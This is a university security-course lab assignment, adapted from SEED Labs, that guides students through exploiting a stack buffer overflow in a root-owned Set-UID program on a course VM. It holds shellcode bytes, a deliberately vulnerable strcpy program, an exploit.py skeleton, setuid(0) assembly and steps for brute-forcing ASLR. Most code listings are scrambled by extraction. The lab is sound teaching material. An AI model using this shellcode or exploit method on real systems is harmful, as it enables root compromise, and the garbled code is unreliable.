Please read this description in its entirety before starting the assignment!
A buffer overflow is defined as the condition in which a program attempts to write data beyond the boundary of a buffer. This vulnerability can be used by a malicious user to alter the flow control of the program, leading to the execution of malicious code. You will be given a program with a buffer-overflow vulnerability; your task is to develop a scheme to exploit the vulnerability and finally gain root privilege. In addition to the attacks, you will be guided through several protection schemes that have been implemented in the operating system to counter against buffer-overflow attacks, and gauge their efficacy. You will record your observations in a report and submit this report to Blackboard for grading.
In this lab, you will:
This assignment requires the use of the course VM.
Modern operating systems have implemented several security mechanisms to make the buffer-overflow attack difficult. To simplify our attacks, we need to disable them first. Later on, we will enable them and see whether our attack can still be successful or not.
Address Space Randomization. Ubuntu and several other Linux-based systems uses address space randomization to randomize the starting address of heap and stack. This makes guessing the exact addresses difficult; guessing addresses is one of the critical steps of buffer-overflow attacks. This feature can be disabled using the following command:
$ sudo sysctl -w kernel.randomize_va_space=0
StackGuard and Non-Executable Stack. These are two additional countermeasures implemented in the system. They can be turned off during compilation. We will discuss them later when we compile the vulnerable program.
The ultimate goal of buffer-overflow attacks is to inject malicious code into the target program, so the code can be executed using the target program’s privilege. Shellcode is widely used in most code-injection attacks.
A shellcode is basically a piece of code that launches a shell. If we use C code to implement it, it will look like the following:
#include <stdio.h>
int main() {
char *name[2];
[0] = "/bin/bash";
name[1] = NULL;
name(name[0], name, NULL);
execve}
Unfortunately, we cannot just compile this code and use the binary code as our shellcode. The best way to write a shellcode is to use assembly code. In this assignment, we only provide the binary version of a shellcode, without explaining how it works (it is non-trivial).
Our generic shellcode is listed in the following:
= (
shellcode "\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"
"\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"
"\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"
"/bin/bash*" # (1)
"-c*" # (2)
"/bin/ls -l; echo Hello 32; /bin/tail -n 2 /etc/passwd *" # (3)
# The * in the above line serves as the position marker *
"AAAA" # Placeholder for argv[0] --> "/bin/bash"
"BBBB" # Placeholder for argv[1] --> "-c"
"CCCC" # Placeholder for argv[2] --> the command string
"DDDD" # Placeholder for argv[3] --> NULL
'latin-1') ).encode(
The shellcode above basically invokes the execve() system call to execute /bin/sh.
//sh
”, rather than
“/sh
” into the stack. This is because we need a 32-bit
number here, and “/sh
” has only 24 bits. Fortunately,
“//
” is equivalent to “/
”, so we can get
away with a double slash symbol.execve()
via the
ebx
, ecx
and edx
registers,
respectively. The majority of the shellcode basically constructs the
content for these three arguments.execve()
is called when we set
al
to 0x0b
, and execute
“int 0x80
”.We have generated the binary code from the assembly code above,
and put the code in a C program called call_shellcode.c
inside the shellcode/
folder.
Compile and run the 32-bit shellcode in
call_shellcode.c
, and observe what happens. The code
includes two copies of shellcode: one is 32-bit and the other is
64-bit. We will only use the 32-bit shellcode in this assignment.
Make sure to compile the program using the -m32
flag to
use the 32-bit version will be used; without this flag, the 64-bit
version will be used. The Makefile
already handles
this.
In your report, describe your observations. Include a screenshot of the program running.
The vulnerable program used in this assignment is called
stack.c
, which is in the code
folder. This
program has a buffer-overflow vulnerability, and your job is to
exploit this vulnerability and gain the root privilege. The code
listed below has some non-essential information removed, so it is
slightly different from what you get from the repository.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 100
#endif
void dummy_function(char *str);
int bof(char *str)
{
char buffer[BUF_SIZE];
// The following statement has a buffer overflow problem
(buffer, str);
strcpy
return 1;
}
int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
= fopen("badfile", "r");
badfile if (!badfile) {
("Opening badfile"); exit(1);
perror}
int length = fread(str, sizeof(char), 517, badfile);
("Input size: %d\n", length);
printf(str);
dummy_function(stdout, "==== Returned Properly ====\n");
fprintfreturn 1;
}
The above program has a buffer overflow vulnerability. It first
reads an input from a file called badfile
, and then
passes this input to another buffer in the function
bof()
. The original input can have a maximum length of
517 bytes, but the buffer in bof()
is only
BUF SIZE
bytes long, which is less than 517. Because
strcpy()
does not check boundaries, buffer overflow
will occur. Since this program is a root-owned Set-UID program, if a
normal user can exploit this buffer overflow vulnerability, the user
might be able to get a root shell. It should be noted that the
program gets its input from a file called badfile
. This
file is under users’ control. Now, our objective is to create the
contents for badfile
, such that when the vulnerable
program copies the contents into its buffer, a root shell can be
spawned.
Compilation. To compile the above vulnerable
program, do not forget to turn off the StackGuard and the
non-executable stack protections using the
-fno-stack-protector
and -z execstack
options. After the compilation, we need to make the program a
root-owned Set-UID program. We can achieve this by first change the
ownership of the program to root
, and then change the
permission to 4755 to enable the Set-UID bit. It should be noted
that changing ownership must be done before turning on the Set-UID
bit, because ownership change will cause the Set-UID bit to be
turned off.
$ gcc -DBUF_SIZE=100 -m32 -o stack -z execstack -fno-stack-protector stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack
The compilation and setup commands are already included in
Makefile
, so we just need to type make
to
execute those commands. The variables L1, ..., L4
are
set in Makefile
; they will be used during the
compilation.
To exploit the buffer-overflow vulnerability in the target program, the most important thing to know is the distance between the buffer’s starting position and the place where the return-address is stored. We will use a debugging method to find it out. Since we have the source code of the target program, we can compile it with the debugging flag turned on. That will make it more convenient to debug.
We will add the -g
flag to gcc
command,
so debugging information is added to the binary. If you run
make
, the debugging version is already created. We will
use gdb
to debug stack-L1-dbg
. We need to
create a file called badfile
before running the
program.
$ touch badfile <- Create an empty badfile
$ gdb stack-L1-dbg
gdb-peda$ b bof <- Set a break point at function bof()
Breakpoint 1 at 0x124d: file stack.c, line 18.
gdb-peda$ run <- Start executing the program
...
Breakpoint 1, bof (str=0xffffcf57 ...) at stack.c:18 18 {
gdb-peda$ next <- See the note below
...
22 strcpy(buffer, str);
gdb-peda$ p $ebp <- Get the ebp value
$1 = (void *) 0xffffdfd8
gdb-peda$ p &buffer <- Get the buffer’s address
$2 = (char (*)[100]) 0xffffdfac
gdb-peda$ quit <- Exit
Note 1. When gdb stops inside the
bof()
function, it stops before the ebp
register is set to point to the current stack frame, so if we print
out the value of ebp
here, we will get the caller’s
ebp
value. We need to use next to execute a few
instructions and stop after the ebp
register is
modified to point to the stack frame of the bof()
function. The SEED book is based on Ubuntu 16.04, and
gdb
’s behavior is slightly different, so the book does
not have the next step.
Note 2. It should be noted that the frame
pointer value obtained from gdb
is different from that
during the actual execution (without using gdb
). This
is because gdb
has pushed some environment data into
the stack before running the debugged program. When the program runs
directly without using gdb
, the stack does not have
those data, so the actual frame pointer value will be larger. You
should keep this in mind when constructing your payload.
To exploit the buffer-overflow vulnerability in the target
program, we need to prepare a payload, and save it inside
badfile
. We will use a Python program to do that. We
provide a skeleton program called exploit.py
, which is
included in the repository. The code is incomplete, and students
need to replace some of the essential values in the code.
#!/usr/bin/python3
import sys
# Replace the content with the actual shellcode
= (
shellcode"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
'latin-1')
).encode(
# Fill the content with NOP's
= bytearray(0x90 for i in range(517))
content
##################################################################
# Put the shellcode somewhere in the payload
= 0 # Change this number
start + len(shellcode)] = shellcode
content[start:start
# Decide the return address value
# and put it somewhere in the payload
= 0x00 # Change this number
ret = 0 # Change this number
offset
= 4 # Use 4 for 32-bit address and 8 for 64-bit address
L + L] = (ret).to_bytes(L,byteorder='little')
content[offset:offset ##################################################################
# Write the content to a file
with open('badfile', 'wb') as f:
f.write(content)
Run this program to generate the contents for
badfile
. Then run the vulnerable program
stack
.
$ ./exploit.py <- create the badfile
$ ./stack-L1 <- launch the attack by running the vulnerable program
Finish the above program to execute the buffer overflow attack. If your exploit is implemented correctly, you should be able to get a root shell:
$ ./exploit.py
$ ./stack-L1
# <- Bingo! You've got a root shell!
In your report, in addition to providing screenshots to
demonstrate your investigation and attack, you also need to explain
how the values used in your exploit.py
are decided.
These values are the most important part of the attack, so a
detailed explanation can help the instructor grade your report. Only
demonstrating a successful attack without explaining why the attack
works will not receive many points.
dash
’s countermeasureThe dash
shell in Ubuntu drops privileges when it
detects that the effective UID does not equal to the real UID (which
is the case in a Set-UID program). This is achieved by changing the
effective UID back to the real UID, essentially, dropping the
privilege. In the previous tasks, we let /bin/sh
points
to another shell called zsh
, which does not have such a
countermeasure. In this task, we will change it back, and see how we
can defeat the countermeasure. Please do the following, so
/bin/sh
points back to /bin/dash
.
$ sudo ln -sf /bin/dash /bin/sh
To defeat the countermeasure in buffer-overflow attacks, all we
need to do is to change the real UID, so it equals the effective
UID. When a root-owned Set-UID program runs, the effective UID is
zero, so before we invoke the shell program, we just need to change
the real UID to zero. We can achieve this by invoking
setuid(0)
before executing execve()
in the
shellcode.
The following assembly code shows how to invoke
setuid(0)
. The binary code is already put inside
call_shellcode.c
. You just need to add it to the
beginning of the shellcode.
; Invoke setuid(0): 32-bit
xor ebx, ebx ; ebx = 0: setuid()’s argument
xor eax, eax
mov al, 0xd5 ; setuid()’s system call number
int 0x80
; Invoke setuid(0): 64-bit
xor rdi, rdi ; rdi = 0: setuid()’s argument
xor rax, rax
mov al, 0x69 ; setuid()’s system call number
syscall
call_shellcode.c
into root-owned binary (by
typing “make setuid
”). Run the shellcode
a32.out
without the setuid(0)
system call.
Please describe and explain your observations. Include a screenshot
in your report.a32.out
with the
setuid(0)
system call. Please describe and explain your
observations. Include a screenshot in your report.# ls -l /bin/sh /bin/zsh /bin/dash
On 32-bit Linux machines, stacks only have 19 bits of entropy, which means the stack base address can have 219 = 524, 288 possibilities. This number is not that high and can be exhausted easily with the brute-force approach. In this part, we use such an approach to defeat the address randomization countermeasure on our 32-bit VM.
stack-L1
. Please describe and explain your observation
in your report.$ sudo /sbin/sysctl -w kernel.randomize_va_space=2
badfile
can eventually be correct. We will only try
this on stack-L1
, which is a 32-bit program. You can
use the following shell script to run the vulnerable program in an
infinite loop. If your attack succeeds, the script will stop;
otherwise, it will keep running. Please be patient, as this may take
a few minutes, but if you are very unlucky, it may take longer.
Please describe your observation in your report. Include a
screenshot in your report.Many compilers, such as gcc
, implements a security
mechanism called StackGuard to prevent buffer overflows. In the
presence of this protection, buffer overflow attacks will not work.
In the previous parts, we disabled the StackGuard protection
mechanism when compiling the programs. In this part, we will turn it
on and see what will happen.
First, repeat the Level-1 attack with the StackGuard off, and
make sure that the attack is still successful. Remember to turn off
the address randomization, because you have turned it on in the
previous task. Then, we turn on the StackGuard protection by
recompiling the vulnerable stack.c program without the
-fno-stack-protector
flag. In gcc version 4.3.3 and
above, StackGuard is enabled by default. Launch the attack; report
and explain your observations. Include a screenshot in your
report.
Operating systems used to allow executable stacks, but this has
now changed: In Ubuntu, the binary images of programs (and shared
libraries) must declare whether they require executable stacks or
not, i.e., they need to mark a field in the program header. Kernel
or dynamic linker uses this marking to decide whether to make the
stack of this running program executable or non-executable. This
marking is done automatically by gcc
, which by default
makes stack non-executable. We can specifically make it
non-executable using the “-z noexecstack
” flag in the
compilation. In our previous tasks, we used
“-z execstack
” to make stacks executable.
Aside. It should be noted that non-executable stack only makes it impossible to run shellcode on the stack, but it does not prevent buffer-overflow attacks, because there are other ways to run malicious code after exploiting a buffer-overflow vulnerability. The return-to-libc attack is an example.
In this task, we will make the stack non-executable. We will do
this experiment in the shellcode folder. The
call_shellcode
program puts a copy of shellcode on the
stack, and then executes the code from the stack. Please recompile
call_shellcode.c
into a32.out
, without the
“-z execstack
” option. Run them, describe and explain
your observations. Include a screenshot in your report.
Submit the following to Blackboard before the assignment due date:
Only one submission per group is necessary. Blackboard is set up with your groups for this lab.
Original SEED Labs version Copyright © 2006-2020 Wenliang Du. Modifications by Tushar Jois for Secure Systems Engineering, Spring 2024.
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. If you remix, transform, or build upon the material, this copyright notice must be left intact, or reproduced in a way that is reasonable to the medium in which the work is being re-published.